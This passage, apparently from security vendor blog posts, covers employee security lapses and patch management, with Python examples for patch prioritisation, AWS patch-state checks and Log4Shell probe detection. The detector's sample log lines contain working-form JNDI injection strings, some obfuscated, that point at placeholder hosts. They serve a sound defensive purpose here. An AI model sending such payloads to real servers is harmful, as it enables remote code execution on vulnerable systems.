The simplest way to compromise business IT systems is with stolen login credentials and API keys. If an attacker can authenticate, they can bypass security controls and take advantage of the employee’s trusted status. The paradigmatic log-in exposure is a username and password stuck to an employee’s monitor, but that’s not the only way attackers obtain credentials. 

  • Sharing credentials: Employees often share authentication credentials with other employees, including those who may not have the same authorization level.
  • Re-using credentials: Using the same usernames and passwords on business systems and other online services increases the risk that they will be exposed.
  • Uploading credentials to version control systems: Employees may choose to upload credentials and keys to version control instead of using secure secret management services.
  • Phishing attacks: As mentioned above, attackers use phishing attacks to harvest authentication credentials.

4. Circumventing Secure Systems

Security and IT professionals implement and monitor secure systems they expect employees to use. But there is often a trade-off between security and productivity, and employees may seek a more convenient option if it allows them to work more efficiently. 

This phenomenon is one of the key drivers of shadow IT, in which employees, teams, and even whole business units use non-approved devices, software, and IT and cloud services because they are “better” than the services officially approved by the company. Of course, employees and security professionals often define “better” very differently, especially when sensitive data is stored and processed on unvetted third-party services. 

5. Poor Data Storage and Transport Practices

A nightmare scenario for IT security professionals: an employee accesses sensitive data and transfers it unencrypted to a portable drive. They want to work on the data at home but lose the bag containing the drive on their commute. Without training, employees are unlikely to understand the need for encryption and the consequences of removing data from secure storage. 

Alternative risk scenarios include employees who:

  • Email sensitive data to third parties or themselves
  • Share authentication credentials with unauthorized third parties
  • Upload data to insecure cloud services for easier access

In our examples, the employee may be acting from positive motives. But deliberate data theft by departing employees is also a huge issue—one reason removing access from employees who quit or are let go is so important. 

6. Failure to Secure Remote Working Environments

Employees who work remotely present risks that don’t arise when the business controls the working environment. These risks are exacerbated when employees use their personal devices and preferred software to complete tasks. 

Risks include:

  • Unsecured WiFi networks and routers
  • Use of devices that may have been compromised
  • Reduced security awareness and diligence
  • Reduced monitoring and oversight

To learn more about how businesses can reduce remote work risks, visit KirkpatrickPrice’s Remote Access Security Testing resources. 

Risk Management: Reducing Employee Compliance Failures

We’ve seen why employees ignore security policies and how that can increase risk. But what can businesses do to manage that risk? Combatting this type of insider threat may be challenging, but we have identified several approaches that help employees act securely and responsibly.

  • Promote a positive security culture. Ensure security policies are transparent and easy to understand. Encourage employees to report potential security issues and incentivize them to conform to policies.
  • Penetration testing. Pen testing can help to identify potential weaknesses, including those caused by employees.
  • Security awareness training. Ensure all employees understand essential security policies and why the company expects them to be followed.
  • Information security audits. Regular audits help businesses to identify and mitigate inadequate policies, processes, and behaviors.

Connect with an Expert

If you want to talk to an information security and compliance expert about reducing employee risk and combating insider threats, contact KirkpatrickPrice today.

Regular software updates and rigorous patch management processes are essential to maintaining security and compliance. Even the most careful proprietary and open source software development introduces bugs. Some of those bugs create security vulnerabilities, and cybercriminals are always looking for opportunities to infiltrate business IT resources and steal sensitive data. 

A report from Arctic Wolf, a security operations vendor, shows the scale of the problem. Exposure of a known vulnerability to external networks accounted for 82% of the security incidents the company handled in the first quarter of 2022. Of those incidents, 57% could have been avoided by applying a patch that was already available. The remainder involved vulnerable services that should never have been reachable from the public internet in the first place. 

A systematic, scheduled, and comprehensive patch management policy is the only realistic way for a business to manage that risk at scale. 

What is Patch Management?

Patch management encompasses a range of processes that ensure potentially vulnerable software is updated as soon as a fix is available. The term “patch” comes from the development world, where a patch is a file containing a set of changes to a piece of software. Patches add and remove features and refactor code. But, most importantly, they fix known vulnerabilities.

We all regularly patch (update) software on our devices with the click of a button. However, patching is much more challenging for complex business IT systems. Most of us don’t mind rebooting our smartphone when it updates, but a business can’t simply shut down its network. It can’t apply patches that haven’t been tested in case they break essential services. And, quite often, it doesn’t know which software needs patching in the first place. 

Software patch management is intended to overcome these problems. It typically involves a number of processes, including:

  • Software discovery: Businesses should develop an inventory of all operating systems and software on their network. They can’t update software if they don’t know about it.
  • Standardization: Patch management is less challenging if businesses standardize on particular operating systems and software products.
  • Vulnerability monitoring: IT and security professionals should track vulnerability reports for software the business uses.
  • Release tracking: They should also track vendor patch releases so that fixes can be applied as soon as they are available.
  • Risk assessment: Assessing vulnerability risk helps businesses to prioritize critical vulnerabilities and patches for core systems.
  • Testing: Modifying software has the potential to change its functionality and cause performance regressions. Testing allows businesses to identify issues before they impact production systems.
  • Patching: The patches are applied to production systems, often beginning with a subset to verify there are no unexpected results.
  • Monitoring: Ensure that all IT resources perform as expected after the update.

As you can see, patch management is not straightforward. However, many aspects can be automated by patch management software, as we’ll see later in this article.

Patch Management and Compliance

Compliance and audit failures may occur when businesses:

  1. Fail to patch vulnerabilities promptly.
  2. Implement inadequate patch management processes.

As we’ve seen, exposing software with known vulnerabilities to the public internet is a common cause of network infiltration and data theft. That reality is reflected in information security and privacy regulations and standards. 

  • PCI DSS: Requirement 6.1 states that businesses should establish a process to identify security vulnerabilities, and Requirement 6.2 states that all system components and software should be protected from known vulnerabilities by installing applicable vendor-supplied security patches (v3.2.1 numbering; the equivalent v4.0 requirements are 6.3.1 and 6.3.3).
  • HIPAA: 45 CFR § 164.308(a)(1)(i), the Security Management Process standard, requires covered entities to implement policies and procedures to prevent, detect, contain, and correct security violations.
  • ISO 27001: Control A.12.6.1 (Management of technical vulnerabilities, in the 2013 edition; renumbered A.8.8 in the 2022 edition) states that vulnerabilities should be promptly identified, subjected to a risk assessment, and remediated through appropriate measures, including patching the affected assets.

Other information security frameworks and standards include similar requirements which assert or imply the necessity of a robust and effective patch management process. 

How to Monitor Critical Security Vulnerabilities

Businesses must be aware of software vulnerabilities before they can fix them. To do so, it is necessary to:

  1. Understand which software your business operates.
  2. Monitor sources of vulnerability information for relevant announcements.
  3. Assess the level of risk a vulnerability poses.

There is no canonical source for vulnerability data, and it is often best to monitor vulnerability and update information published by software vendors and open source projects. You should also monitor public vulnerability databases, which include:

These databases allow users to search for vulnerabilities in specific software and software created by specific vendors. 
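The process described in the patch management steps above (discovery, vulnerability monitoring, risk assessment, and a first rollout wave) and the three monitoring steps in this section can be tied together in a small amount of code. The following is an added example, not code from the article or from any vendor tool. It matches a software inventory against a feed of advisories, scores each finding with the CVSS base score plus uplifts for the two factors the article singles out (internet exposure and active exploitation), and picks a pilot host per advisory for the first patch wave. The package names are real, but the hosts, versions, advisory identifiers (the `EX-2024-…` IDs are placeholders) and scoring weights are constructed for illustration.

```python
"""Prioritise patches by matching a software inventory against advisories.

Added example; not code from the article or from any vendor tool. The
hosts, versions, advisory IDs and scoring weights are all constructed.
"""
import re
from dataclasses import dataclass


def parse_version(version: str) -> tuple:
    """Turn '2.14.1' or '2.0-rc1' into a comparable tuple.

    Numeric components compare numerically, and a pre-release suffix
    sorts below the corresponding final release.
    """
    main, _, prerelease = version.partition("-")
    numbers = tuple(int(part) for part in re.findall(r"\d+", main))
    return (numbers, 0 if prerelease else 1, prerelease)


@dataclass(frozen=True)
class Asset:
    host: str
    package: str
    version: str
    internet_facing: bool


@dataclass(frozen=True)
class Advisory:
    advisory_id: str
    package: str
    affected_from: str      # first affected version (inclusive)
    fixed_in: str           # first fixed version (exclusive upper bound)
    cvss: float
    exploited_in_wild: bool


def is_affected(asset: Asset, advisory: Advisory) -> bool:
    """True if the installed version falls inside the advisory's range."""
    if asset.package != advisory.package:
        return False
    installed = parse_version(asset.version)
    return parse_version(advisory.affected_from) <= installed < parse_version(advisory.fixed_in)


def risk_score(asset: Asset, advisory: Advisory) -> float:
    """CVSS base score plus constructed uplifts for public exposure and
    for vulnerabilities already being exploited."""
    score = advisory.cvss
    if asset.internet_facing:
        score += 2.0
    if advisory.exploited_in_wild:
        score += 3.0
    return score


def build_patch_plan(assets, advisories):
    """Return (score, host, advisory_id) triples, highest risk first."""
    findings = [
        (risk_score(asset, adv), asset.host, adv.advisory_id)
        for asset in assets
        for adv in advisories
        if is_affected(asset, adv)
    ]
    return sorted(findings, key=lambda f: (-f[0], f[1]))


def pilot_hosts(plan):
    """Pick one host per advisory for the first rollout wave, preferring
    the lowest-risk (normally internal) host so a bad patch is caught
    there rather than on the edge."""
    pilots = {}
    for _, host, advisory_id in reversed(plan):
        pilots.setdefault(advisory_id, host)
    return pilots


# Constructed inventory and advisory feed (illustrative values only).
INVENTORY = [
    Asset("web-01", "curl", "7.88.1", internet_facing=True),
    Asset("web-02", "curl", "8.4.0", internet_facing=True),
    Asset("db-01", "curl", "7.88.1", internet_facing=False),
    Asset("app-01", "log4j-core", "2.14.1", internet_facing=True),
    Asset("app-02", "log4j-core", "2.17.1", internet_facing=False),
    Asset("batch-01", "log4j-core", "2.14.1", internet_facing=False),
]
ADVISORIES = [
    Advisory("EX-2024-0001", "curl", "7.69.0", "8.4.0", cvss=7.5, exploited_in_wild=False),
    Advisory("EX-2024-0002", "log4j-core", "2.0", "2.15.0", cvss=10.0, exploited_in_wild=True),
]

if __name__ == "__main__":
    plan = build_patch_plan(INVENTORY, ADVISORIES)
    for score, host, advisory_id in plan:
        print(f"{score:5.1f}  {host:10s}  {advisory_id}")
    print("pilot wave:", pilot_hosts(plan))
```

In practice the inventory comes from a discovery tool or package manager export and the advisory feed from vendor bulletins or a public database, but the matching and ranking logic stays the same; the uplifts are the place to encode your own risk model.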

Patch Management Software

Patch management software automates some of the processes outlined above, allowing businesses to reduce the cost and complexity of keeping their software safe and up-to-date. There are many competing patch management software solutions with varying features. Businesses should take the time to investigate the capabilities of each to find the best solution for their unique circumstances, but we’d like to highlight three prominent solutions. 

AWS Systems Manager Patch Manager

Patch Manager is a capability of AWS Systems Manager, which integrates many system automation tools. It automates operating system and application patching on managed nodes, that is, EC2 instances and on-premises servers registered with Systems Manager, using patch baselines that define which updates are approved and how quickly. Usefully, Patch Manager integrates with Systems Manager’s maintenance window functionality, so patching can be scheduled to run at convenient times, and it records a compliance state for every node after each scan or install. 
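Scheduling the patch run is only half the job; someone has to confirm that every node actually ended up compliant. The following added example (not AWS code and not from the article) evaluates the per-node state that Patch Manager records, in the shape returned by the SSM `DescribeInstancePatchStatesForPatchGroup` API, and flags nodes with missing or failed patches, a pending reboot, or no recent scan. The sample records, the instance IDs and the seven-day staleness threshold are constructed; the `fetch_patch_states` helper shows the live boto3 call but is not needed to run the check.

```python
"""Flag managed nodes that AWS Systems Manager Patch Manager reports as
non-compliant or stale.

Added example, not code from AWS or from the article. It evaluates records
in the shape returned by DescribeInstancePatchStatesForPatchGroup; the
sample records, instance IDs and thresholds below are constructed.
"""
from datetime import datetime, timedelta, timezone

MAX_SCAN_AGE = timedelta(days=7)   # constructed threshold for a stale scan


def patch_state_findings(states, now):
    """Return {instance_id: [reasons]} for every node that needs attention.

    A node is compliant only if nothing approved is missing, nothing failed,
    no installed patch is waiting on a reboot, and a scan ran recently.
    """
    findings = {}
    for state in states:
        reasons = []
        if state.get("MissingCount", 0):
            reasons.append(f"{state['MissingCount']} approved patch(es) missing")
        if state.get("FailedCount", 0):
            reasons.append(f"{state['FailedCount']} patch(es) failed to install")
        if state.get("InstalledPendingRebootCount", 0):
            reasons.append("installed patches waiting on a reboot")
        last_run = state.get("OperationEndTime")
        if last_run is None or now - last_run > MAX_SCAN_AGE:
            reasons.append("no patch scan within the last 7 days")
        if reasons:
            findings[state["InstanceId"]] = reasons
    return findings


def fetch_patch_states(patch_group, region):
    """Live equivalent: page through the API with boto3. boto3 is imported
    lazily so the rest of the module runs without AWS credentials."""
    import boto3
    ssm = boto3.client("ssm", region_name=region)
    states, kwargs = [], {"PatchGroup": patch_group}
    while True:
        page = ssm.describe_instance_patch_states_for_patch_group(**kwargs)
        states.extend(page["InstancePatchStates"])
        if "NextToken" not in page:
            return states
        kwargs["NextToken"] = page["NextToken"]


# Constructed records (the instance IDs are placeholders, not real nodes).
SAMPLE_NOW = datetime(2024, 5, 12, 9, 0, tzinfo=timezone.utc)
_RECENT = datetime(2024, 5, 10, 3, 0, tzinfo=timezone.utc)
_STALE = datetime(2024, 4, 1, 3, 0, tzinfo=timezone.utc)
SAMPLE_STATES = [
    {"InstanceId": "i-0aaa1111", "PatchGroup": "web", "Operation": "Scan",
     "MissingCount": 0, "FailedCount": 0, "InstalledPendingRebootCount": 0,
     "OperationEndTime": _RECENT},
    {"InstanceId": "i-0bbb2222", "PatchGroup": "web", "Operation": "Scan",
     "MissingCount": 4, "FailedCount": 0, "InstalledPendingRebootCount": 0,
     "OperationEndTime": _RECENT},
    {"InstanceId": "i-0ccc3333", "PatchGroup": "web", "Operation": "Install",
     "MissingCount": 0, "FailedCount": 1, "InstalledPendingRebootCount": 2,
     "OperationEndTime": _RECENT},
    {"InstanceId": "i-0ddd4444", "PatchGroup": "web", "Operation": "Scan",
     "MissingCount": 0, "FailedCount": 0, "InstalledPendingRebootCount": 0,
     "OperationEndTime": _STALE},
]

if __name__ == "__main__":
    for instance_id, reasons in patch_state_findings(SAMPLE_STATES, SAMPLE_NOW).items():
        print(instance_id, "->", "; ".join(reasons))
```

To run it against a real account, replace `SAMPLE_STATES` with `fetch_patch_states("web", "us-east-1")` and `SAMPLE_NOW` with `datetime.now(timezone.utc)`; the pending-reboot check matters because Patch Manager counts such patches as installed even though the vulnerable code is still running.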

Azure Automation Update Management

Azure Automation offers a range of automation tools for Microsoft’s Azure cloud platform. Its Update Management tool can automatically assess and install updates for Windows and Linux operating systems running on Azure or on-premises. Microsoft has since announced the retirement of Azure Automation Update Management in favour of Azure Update Manager, so new deployments should start with the latter. 

Red Hat Satellite

Red Hat Satellite is a comprehensive infrastructure management tool with automatic patch management functionality. Satellite can report which servers need to be updated and automatically apply updates as required. 

Other patch management tools include SolarWinds Patch Manager, LANDesk Patch Manager, ManageEngine Patch Manager Plus, and Ivanti Patch Manager.

3 Critical Vulnerabilities You Should Patch Immediately

Failure to patch is the root cause of many of the most serious security incidents. A vulnerability in widely used software can have a catastrophic impact on thousands of businesses. To conclude this article, we will look at three critical and widespread vulnerabilities, all of which continue to be exploited by cybercriminals, despite the availability of patches that would protect businesses and their customers.

Log4j

Log4j is a logging library for the Java ecosystem. It is embedded in hundreds of thousands of servers and applications and is particularly popular in the enterprise space. In December 2021, a critical remote code execution vulnerability was disclosed. Dubbed Log4Shell, it allows an unauthenticated attacker to execute arbitrary code on any system that logs an attacker-controlled string, because vulnerable Log4j versions evaluated JNDI lookups embedded in logged messages. It has been described as “the biggest, most critical vulnerability of the last decade.”

A fixed release (Log4j 2.15.0, followed by further hardening releases) was published at the time of disclosure, yet many servers and applications remain vulnerable, often because Log4j is bundled inside third-party software that the business does not know it is running. 
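Because Log4Shell triggers on whatever string reaches the logger, attackers sprayed the lookup into HTTP headers and query strings, and the probes are still visible in web server logs today. The following is an added detection example, not code from the article or from the Log4j project. It collapses the common obfuscation forms (`${lower:…}`, `${upper:…}` and the `${…:-x}` default-value syntax), URL-decodes the line, and then looks for the `${jndi:` lookup. The log lines are constructed and use documentation IP ranges; a hit means the host was probed, not that it was successfully exploited.

```python
"""Detect Log4Shell (JNDI lookup) probes in web server log lines.

Added example, not from the article or the Log4j project. The log lines
below are constructed; the addresses are documentation ranges.
"""
import re
from urllib.parse import unquote

# ${lower:X} / ${upper:X} resolve to X. ${anything:-X} is the default-value
# form (it covers ${::-X} and ${env:NOPE:-X}) and also resolves to X.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise_lookups(text: str, max_rounds: int = 8) -> str:
    """Collapse nested obfuscation lookups inside-out until nothing changes."""
    for _ in range(max_rounds):
        collapsed = _CASE_LOOKUP.sub(r"\1", text)
        collapsed = _DEFAULT_LOOKUP.sub(r"\1", collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after decoding and collapsing."""
    return _JNDI.search(normalise_lookups(unquote(line))) is not None


def scan_log(lines):
    """Return (line number, normalised line) for every line that looks like a probe."""
    return [
        (number, normalise_lookups(unquote(line)))
        for number, line in enumerate(lines, 1)
        if is_log4shell_probe(line)
    ]


# Constructed access-log lines: one benign request, four probe variants
# (plain, lower-lookup, default-value lookup, URL-encoded) and one benign
# string that merely looks like a lookup.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:14:02:12 +0000] "GET /?x=${jndi:ldap://203.0.113.5:1389/a} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:14:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.5:1099/x}"',
    '198.51.100.7 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.5%2Fa%7D HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.9 - - [10/Dec/2021:14:02:16 +0000] "GET /docs/${version}/index.html HTTP/1.1" 404 128 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, line in scan_log(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

The normalisation step is what separates this from a naive `grep jndi`: the third and fourth sample lines contain no literal `jndi` until the nested lookups are resolved. Treat a hit as a signal to check whether the receiving application logs the field in question with a vulnerable Log4j, not as proof of compromise.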

ProxyShell

ProxyShell is an attack chain that strings together three Microsoft Exchange Server vulnerabilities: a pre-authentication path confusion in the Autodiscover front end, a privilege elevation in the Exchange PowerShell backend, and an arbitrary file write that lets the attacker drop a web shell on the server. Because the chain starts from the internet-facing Client Access service and needs no credentials, it is relatively straightforward to exploit and was weaponized within weeks of being publicly demonstrated. 

Microsoft fixed the three underlying vulnerabilities in its April and May 2021 Exchange security updates, although two of the CVEs were only publicly documented in July 2021, so any Exchange server patched before then should be checked rather than assumed safe.

SpringShell

Spring is an enormously popular application framework for Java. In March 2022, a remote code execution vulnerability in the Spring Framework, dubbed SpringShell or Spring4Shell, was disclosed. It is not considered as severe as Log4Shell because exploitation depends on a specific combination of JDK version and deployment configuration, but cybercriminals began exploiting it within days of disclosure to gain access to servers running vulnerable Spring applications. 

Fixed releases (Spring Framework 5.3.18 and 5.2.20) were published at the time of disclosure, and businesses using the Spring Framework should upgrade to those or later versions as soon as possible.

Enterprise Security and Compliance with KirkpatrickPrice

KirkpatrickPrice provides services to help businesses secure their infrastructure and comply with regulatory frameworks and standards, including compliance audits, penetration testing, and remote access security testing.